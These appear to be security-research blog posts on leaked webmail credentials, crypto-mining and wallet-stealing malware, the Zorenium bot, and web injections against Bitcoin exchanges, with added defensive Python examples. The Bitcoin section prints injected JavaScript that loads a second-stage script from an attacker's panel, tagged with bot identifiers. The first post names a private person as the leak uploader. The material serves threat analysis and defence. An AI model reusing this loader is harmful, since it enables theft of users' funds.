After the Russian Yandex and Mail.ru, Gmail Accounts are Leaked. Who will be Tomorrow’s Target?

This morning cyber security sources informed us for the third time this week about email addresses and passwords being leaked from a large mail provider. After the Russian services Yandex.ru (one million leaked emails) and Mail.ru (4.5 million leaked emails), came Gmail’s turn – around five million emails were posted on a Russian platform.

According to publications about the Gmail leak, the data was published on a Russian forum that focuses on bitcoin issues – Bitcoin Security. The forum member who uploaded the database is nicknamed tvskit, and he was the first one to publish the data online in all three of the cases.

A short search on the above nickname on social networks revealed a 34-year old man by the name of Ivan Bragin, from the Perm administrative center in Russia. His VK and Twitter pages contain plenty of information regarding crypto-currencies, in addition to a tweet about the Gmail leak linked to the BTC forum. From his posts, it seems that he did not directly connect himself to the leaks, nor did he take credit for stealing the data. Moreover, the story he tells is about running into these email lists on the web, then deleting the passwords and publishing them ‘for the greater good’. It is a strange coincidence that all three lists were found by the same person.

The fact that tvskit‘s real identity was so easy to find (he made no attempt to hide it), combined with the fact that the account list was initially published without the passwords (“just in order for people to check if their address was on the list”), makes us doubt that he stole the data.

According to several cyber security sources that analyzed the database, some of the compromised mail accounts were either automatically registered or were not active in the past. Nevertheless, some users of the above providers did confirm the authenticity of the logins and passwords.

Yandex and Mail.ru denied any kind of breach of their databases, so the leading hypothesis about the origin of the accounts is that all three lists were collected over a long period of time, from different sources, perhaps along with other, less “attractive” data, and were later sorted by email provider and published online. In addition, we should also consider that at least some of the addresses are fictitious or invalid. At this moment, it is difficult to specify the exact number of addresses with a valid password.

Relying on the information above, we believe that all three lists were obtained by the same person (not necessarily tvskit), who managed to get hold of some valid logins and passwords and then mixed them with non-valid or automatically created addresses to intensify the scale of the leak.
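The hypothesis above (valid credentials padded with invalid or bulk-registered addresses, then sorted by provider) is exactly what an analyst checks first when a dump of this kind lands. The script below is an added example, not part of the original post and not based on the real leaked lists: it runs a first-pass triage over a constructed `login:password` dump, counting malformed entries, exact duplicate lines, accounts that appear with several different passwords (a sign of merged sources), addresses whose local part is mostly digits (a heuristic for auto-registered accounts, with an assumed threshold), and distinct accounts per provider. Whether a password is actually valid cannot be determined offline, which is why the figures here are only an upper bound on the list's real size.

```python
import re
from collections import Counter, defaultdict

# Constructed sample dump in the usual "login:password" layout.  These are made-up
# entries for the example, not data from the leaks discussed above.
SAMPLE_DUMP = """\
alice.m@gmail.com:Summer2013!
bob77@gmail.com:qwerty123
alice.m@gmail.com:Summer2013!
ivan.petrov@yandex.ru:molodec
auto-user-1029384756@gmail.com:kx9Qa2Lp
usr4827361950@mail.ru:Zq8wE3rT
not-an-email:password
bob77@gmail.com:hunter2
"""

# Deliberately simple syntax check; it only weeds out lines that cannot be an address.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def looks_auto_generated(local_part: str, digit_ratio: float = 0.5) -> bool:
    """Heuristic for bulk-registered accounts: a long local part that is mostly digits.
    The length and ratio thresholds are assumptions chosen for this example."""
    if len(local_part) < 8:
        return False
    digits = sum(ch.isdigit() for ch in local_part)
    return digits / len(local_part) >= digit_ratio


def triage(dump: str) -> dict:
    """Summarise a credential dump without touching any live service."""
    seen_lines = set()
    passwords = defaultdict(set)  # account -> distinct passwords seen for it
    stats = {"lines": 0, "malformed": 0, "exact_duplicates": 0}

    for raw in dump.splitlines():
        line = raw.strip()
        if not line:
            continue
        stats["lines"] += 1
        if line in seen_lines:            # identical line repeated: padding or a re-merge
            stats["exact_duplicates"] += 1
            continue
        seen_lines.add(line)
        email, sep, password = line.partition(":")
        email = email.lower()
        if not sep or not EMAIL_RE.match(email):
            stats["malformed"] += 1
            continue
        passwords[email].add(password)

    stats["distinct_accounts"] = len(passwords)
    # Same account with several passwords usually means several sources were merged.
    stats["accounts_multiple_passwords"] = sum(1 for pw in passwords.values() if len(pw) > 1)
    stats["likely_auto_generated"] = sum(
        1 for email in passwords if looks_auto_generated(email.split("@", 1)[0])
    )
    stats["per_provider"] = dict(Counter(email.rsplit("@", 1)[1] for email in passwords))
    return stats


if __name__ == "__main__":
    for key, value in triage(SAMPLE_DUMP).items():
        print(f"{key}: {value}")
```

On a real dump the per-provider split is what tells you whether a list was "sorted by provider" from a larger mixed pool, and the duplicate and multi-password counts shrink the headline number quickly; neither replaces the provider's own check of which passwords still work.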

A forum thread from the Bitcoin Security forum, which contains the leaked Gmail database
Ivan Bragin’s tweet linked to the forum post about the Gmail leak

Exploiting the World of WebMoney

The appearance of virtual money has played in favor of cyber criminals. The level of anonymity provided by crypto currencies is significantly higher than in real money transactions, and leaves much more space for performing illegal activities.

The first and most obvious way to exploit WebMoney and earn an easy profit is to mine virtual currencies via botnets specifically created for the purpose. The underground is awash with different mining bots, miners and mining Trojans for sale (downloads are also available), all of which are designed to infect the PCs of naive users and exploit their CPU/GPU resources to mine the precious coins. The price range varies widely, starting at $50-$100 for a build of a simple Bitcoin/Litecoin miner, $400-$500 for more sophisticated malware capable of mining a wider variety of virtual currencies (such as Namecoins, Dogecoins, QuarkCoins, etc.), and reaching $1,000-$1,500 for complete mining kits that can mine coins on processors or video cards, contain a UAC bypass and a web panel for statistical management of the bots, are signed with a digital certificate, and more.

Litecoin mining Bot
“Diamond Axe” – another mining bot

The abundance of different mining platforms identified over the past year has created some difficulties for those making a living in this area. Prices dropped due to the increase in supply, while in parallel, the miners became more detectable by AV vendors, as a large number of them operate by the same mechanism. We identified forum threads from members looking for alternative methods of money-making, stressing their preference for malware capable of virtual money theft.

This can perhaps shed some light on the shift in the activities of cybercriminals in this area – from creating mining botnets to stealing coins from web wallets. Indeed, in the last month alone, we identified three different stealers of Bitcoin wallets: *coin Grabber, Stealer Coins and Wallet Stealer. While the tools are not very sophisticated, they can cause a great deal of damage. *coin Grabber is designed to steal data (files and passwords) from Bitcoin-QT, MultiBit, Armory and Electrum wallets during the transaction process, and costs $500. Stealer Coins is supposed to search for and steal Bitcoin wallet files and send them to an FTP server, and is sold for $250. The Wallet Stealer is capable of stealing different kinds of WebMoney (not only Bitcoins) from Armory and MultiBit wallets and bypassing UAC, and it costs $600.

The Administration Panel of *coin Grabber

In conclusion, we should mention again the three injection codes for Bitcoin exchanges that were found on one of the Russian underground forums (we wrote about this in detail about a week ago). This code replaces the values of the send-to-address, send-value and send-button elements, thus exploiting a vulnerability on the exchange website.
As time goes by, we are witnessing the evolution of more and more cybercrime tools aimed at the relatively young but very profitable area of web currencies. The simple, easy methods are being abandoned for more complicated ones and new trends are popping up, like in other spheres of the dynamic cyber crime world.

Zorenium Bot: Follow-up

This is a guest post by Dimitry, a forensics expert who will be joining our team soon.


As a follow up to our previous post, here is a quick overview of some of Zorenium’s capabilities.

Please note that we are still in the process of fully analyzing this bot’s capabilities, so the post is mostly based on the information published by the bot maker.

Without a doubt, one of the most interesting modules to start with would be the FakeShoutDown mechanism. If it indeed operates as the author says it does, then it is definitely a new “way of thinking”.

In essence, the authors of Zorenium are faking the shutdown process of a machine. The code imitates the entire process (once the shutdown sequence is initiated by the user), including the proper images and even, and this is quite fascinating, slowing down the computer fans to eliminate the noise.

In my humble opinion, it is quite impressive.

The bot has multiple interfaces of management (such as IRC and I2P), and all come with a great set of 256 bit AES keys.

Another interesting aspect would be the implementation of the steganography module. The steganography module is not a “regular” one, and it makes this bot more sophisticated than others. I am curious to see how that implementation works.

Another funky aspect of the bot would be what the author called “CHRISTMAS USERKIT4 SPECIAL ADDON”. Amongst the various features, the bot will replicate a new disk drive and will drop the core DLLs onto it. Then it will encrypt the hard drive and thus protect it from various AV and anti-malware mechanisms. Pretty sweet if you ask me.

The cherry on this ice cream would be the iOS module. This is definitely the first bot that I have seen that actually operates on “Cross-platforms”. It can infect Android, Windows and iOS systems – a true nightmare to all security specialists. The main question regarding iOS still remains – are only jailbroken phones at risk, or is it much, much worse?

Zorenium Bot Coming to the iPhone Nearest to You

Written by Tanya Koyfman and Assaf Keren

Recently our analysts have been monitoring the advancement of a new threat in the commercial malware theater – the Zorenium Bot. Zorenium, a relatively new and unknown bot, has been for sale on the underground since January 2014. This bot will be getting new features in its March 18th update, including the ability to infect iOS devices (versions 5-7), alongside its existing capability to run on Linux- and Windows-based machines. The developers have also updated the rootkit to TDL4 (making it vulnerable to anti-TDSS tools).


Capture of the recent release notifications

Zorenium, a relative of Betabot, is a very robust bot which is still undetected by most AV companies. It has several key abilities, including DDoS, formgrabbing, bot-killing, a banking Trojan and Bitcoin mining. The cost of a basic Zorenium bot is 350 GBP, and with advanced features (including P2P C&C, I2P C&C and more) it can go up to over 5,000 GBP.


Zorenium Payment Plans

According to the developers, it is still in beta mode and more features will be available in time.


Zorenium Source Screen Capture

Bitcoin Exchange Script Injection Vulnerability

Written by Assaf Keren

It is no secret that Bitcoin is under a lot of scrutiny lately.

Bitcoin

From publicized breaches of Bitcoin trading sites to wild fluctuations of its value, the virtual currency that was considered a hot commodity until very recently is floundering. Perhaps the most alarming story demonstrating the instability of this currency is Mount Gox, once the largest Bitcoin exchange in the world. The site first closed, then filed for bankruptcy, and its CEO’s Twitter account was hacked. With all this controversy, the public is left wondering about the future of Bitcoin and the level of security the exchange sites provide. Naturally, hackers have also taken notice and have started looking for breaches on other Bitcoin exchange sites. Alongside the flurry of phishing emails, Bitcoin mining bots and attempts to hack into Bitcoin exchange sites, there is a new trend: using the ability of Trojans to hijack HTTP sessions, or plain old XSS and CSRF attacks, the attackers inject site-specific code into the pages users see, then scan for available funds in the user accounts and steal money from them.

Recently, our analysts have come upon four different injection codes, three for Bitcoin exchanges and one for a betting site. All of these are fashioned in the same way, and are clearly written by the same author.

Below is an excerpt from one of the injections:

```javascript
// Loader routine from the injection: pulls a second-stage script from the operator's
// panel, tagging the request with the botnet and bot identifiers (placeholders are
// filled in by the malware before the code reaches the browser).
S:function(data){
var s = document.createElement('script');
s.type = 'text/javascript';
s.async=false;
s.src = "{HERE_ADMIN_URL}/?s=bitcoin&v=2&m=%BOTNET%&b=%BOTID%&t="+data+"&rnd="+Math.random();
// Cache-buster in rnd; the handler below just clears itself once the script has loaded.
s.onerror = s.onload = s.onreadystatechange = function(){
if(!this.loaded && (!this.readyState || this.readyState == 'loaded' || this.readyState == 'complete')){
this.onerror = this.onload = this.onreadystatechange = null;
}
}
// Appends the script element to <head> so it executes in the context of the exchange's page.
if(document.getElementsByTagName('head').length){ document.getElementsByTagName('head')[0].appendChild(s); }else{ document.appendChild(s); }
}
```

In the continuation of the code, the attackers change the CSS settings of the site and replace the values of the send-to-address, send-value and send-button elements. All in all, this is very simple and elegant code that utilizes the context in which it is run.

This is not a new method of attack – it has been widely used in the past and probably will continue to be used in the future. However, it demands a good understanding of how the exchanges work and how they fashion their web services and it is very version-specific. To the exchanges, however, this is bad news since this targeting of the users is something that they have a limited capability to defend against (unlike attacks on their servers).
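The excerpt above works by appending a `<script src=...>` that points at the operator's panel. One control an exchange does have on its side of the line is a Content-Security-Policy whose `script-src` only names origins it actually serves scripts from; a browser then refuses to load a script element pointing anywhere else, whichever way the element was inserted. The code below is an added example, not part of the original post or of any exchange's code: it implements a simplified version of the CSP source-matching rules (`'self'`, `'none'`, `*`, scheme sources, host sources with `*.` wildcards and optional path) and checks a weak policy against a tightened one for a script URL of the shape the injection builds. All hosts and URLs in it are constructed placeholders. The caveat the paragraph above already makes still holds: CSP helps when the injection arrives through XSS or reflected content, but a Trojan that hijacks the HTTP session in the victim's browser can strip the header before the page is rendered.

```python
from urllib.parse import urlsplit

# Weak policy: any origin may serve scripts, so an injected <script src=...> loads.
WEAK_CSP = "default-src 'self'; script-src * 'unsafe-inline'"
# Tightened policy (assumed allowlist with placeholder hosts): the site itself and one CDN.
STRICT_CSP = "default-src 'self'; script-src 'self' https://cdn.exchange.example"

# Constructed stand-ins: the page being protected, the exchange's own CDN script, and a
# script URL of the shape the excerpt builds, with {HERE_ADMIN_URL} set to a placeholder.
PAGE_URL = "https://exchange.example/wallet/send"
CDN_SRC = "https://cdn.exchange.example/js/app.js"
INJECTED_SRC = "https://c2.invalid/?s=bitcoin&v=2&m=botnet&b=1234&t=data&rnd=0.42"


def parse_csp(header: str) -> dict:
    """Split a CSP header into {directive-name: [source expressions]}."""
    directives = {}
    for part in header.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    return directives


def _host_matches(pattern_host: str, host: str) -> bool:
    # "*.example.com" matches any subdomain but not the bare apex.
    if pattern_host.startswith("*."):
        return host.endswith(pattern_host[1:])
    return pattern_host == host


def source_allows(expr: str, page: str, url: str) -> bool:
    """Simplified CSP source-expression match of `url` loaded from `page`."""
    page_parts, url_parts = urlsplit(page), urlsplit(url)
    expr_l = expr.lower()
    if expr_l == "'none'":
        return False
    if expr_l == "'self'":
        return (page_parts.scheme, page_parts.netloc) == (url_parts.scheme, url_parts.netloc)
    if expr_l.startswith("'"):
        # 'unsafe-inline', nonces and hashes never match an external src URL.
        return False
    if expr_l == "*":
        return url_parts.scheme in ("http", "https")   # simplification: network schemes only
    if expr_l.endswith(":") and "/" not in expr_l:      # scheme-source such as "https:"
        return url_parts.scheme == expr_l[:-1]
    # host-source: [scheme://]host[:port][/path]
    pattern = urlsplit(expr_l if "://" in expr_l else "//" + expr_l)
    if pattern.scheme and pattern.scheme != url_parts.scheme:
        return False
    if not pattern.scheme and url_parts.scheme not in ("http", "https"):
        return False
    if not _host_matches(pattern.hostname or "", (url_parts.hostname or "").lower()):
        return False
    if pattern.port is not None and pattern.port != url_parts.port:
        return False
    if pattern.path and pattern.path != "/" and not url_parts.path.startswith(pattern.path):
        return False
    return True


def script_allowed(csp_header: str, page: str, script_url: str) -> bool:
    """Would the browser load <script src=script_url> on `page` under this policy?
    script-src is used when present, otherwise default-src, as browsers do."""
    directives = parse_csp(csp_header)
    sources = directives.get("script-src", directives.get("default-src"))
    if sources is None:
        return True   # no applicable directive: nothing restricts the load
    return any(source_allows(expr, page, script_url) for expr in sources)


if __name__ == "__main__":
    for name, policy in (("weak", WEAK_CSP), ("strict", STRICT_CSP)):
        print(name, "allows injected loader:", script_allowed(policy, PAGE_URL, INJECTED_SRC))
        print(name, "allows own CDN script:", script_allowed(policy, PAGE_URL, CDN_SRC))
```

The matcher follows the shape of the real rules but skips corner cases (default-port equivalence, `blob:`/`data:` handling, `'strict-dynamic'`), so treat it as a way to reason about a policy, not as a replacement for testing the header in a browser. A policy that still carries `'unsafe-inline'` in `script-src` leaves the injected code itself free to run; it is the external loader that a tight `script-src` stops.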

The process that the exchanges are going through is very similar to what banks and e-commerce services went through when they started providing Internet services. The problem is that banks have the ability, staff and resources (and insurance) to limit transactions and work with customers on fraud cases, while Bitcoin exchanges do not have that kind of capability yet. Even if a specific attack is stopped, we will probably see more and more attacks on Bitcoin (and other currencies) users. This is just one more step in the evolution of crypto-currency to a more mature state.